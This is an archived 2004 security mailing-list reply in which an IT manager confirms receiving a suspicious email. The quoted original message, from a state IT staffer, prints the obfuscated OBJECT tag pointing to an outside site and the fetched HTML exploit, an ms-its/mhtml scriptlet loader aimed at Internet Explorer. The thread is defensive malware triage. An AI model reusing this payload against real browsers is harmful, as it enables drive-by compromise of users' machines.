Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Focus-Virus
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: Virus from vikord.com?

from [Mauricio Fernandez] Network Security [Permanent Link]
Subject: RE: Virus from vikord.com?
Date: Fri, 27 Aug 2004 17:50:02 -0400 
Samuel:

I received the same mail, and I am pretty sure that is a new kind of
virus.

I sent a copy the Symantec and TrendMicro, but don-t have an answer
yet...

Mauricio Fernández S.
IT Manager
FDTA Valles
www.fdta-valles.org
 

-----Original Message-----
From: Mason, Samuel [mailto:smason@state.mt.us] 
Sent: Friday, August 27, 2004 2:05 PM
To: focus-virus@securityfocus.com
Subject: Virus from vikord.com?

Hello all,

I'd like to see who else has run into this problem. 

We had a user receive a mail from what was supposed to me another State
employee. The email had a GIF attachment (2.gif) With the subject line
of
"2".

The GIF file was invalid and only contained the characters "45451212"

The HTML in the message included this:

<OBJECT data=http://www.v%69k%6F%72d.com/default.htm>

which resolved to www.vikord.com.default.htm. The site is down with a
"Service Temporarily Unavailable" message due to maintenance or capacity
problems. 

I Googled for an answer and got a little info that included this:


Quick snag with wget:

wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50--  http://www.vikord.com/default.htm
           => `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=>                                           ] 350
--.--K/s

14:26:56 (3.34 MB/s) - `default.htm' saved [350]

username@coroner ~ $ cat default.htm
<textarea id="code" style="display:none;">
    <object
data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.c
hm::
/defa
ult.htm"
type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
   
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,
loca
tion.href.inde
xOf('default.htm'))));
</script>

Which seems to indicate the original intent was to download a CHM file,
correct?

I'd like to know if someone else has seen this. Is this a known virus or
something that I just could not find info for? The website is down,
which is
good, but how can we mitigate this on a more permanent basis? Our
workstations indicated that the AtiveX control could not run and the
page
would not display properly but I am concerned that users may have lower
security settings somewhere in the enterprise.

Thanks for any help.


Samuel Mason, CISSP
OCP, Information Technology Services Division
State of Montana
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Virus from vikord.com?, Nick FitzGerald
Next by Date:  RE: system32\winamp.exe, Jeremy Pollack
Previous by Thread:  Re: Virus from vikord.com?, Nick FitzGerald
Next by Thread:  RE: Virus from vikord.com?, alain rebeyrotte
Indexes:  [Date] [Thread] [Top] [All Lists]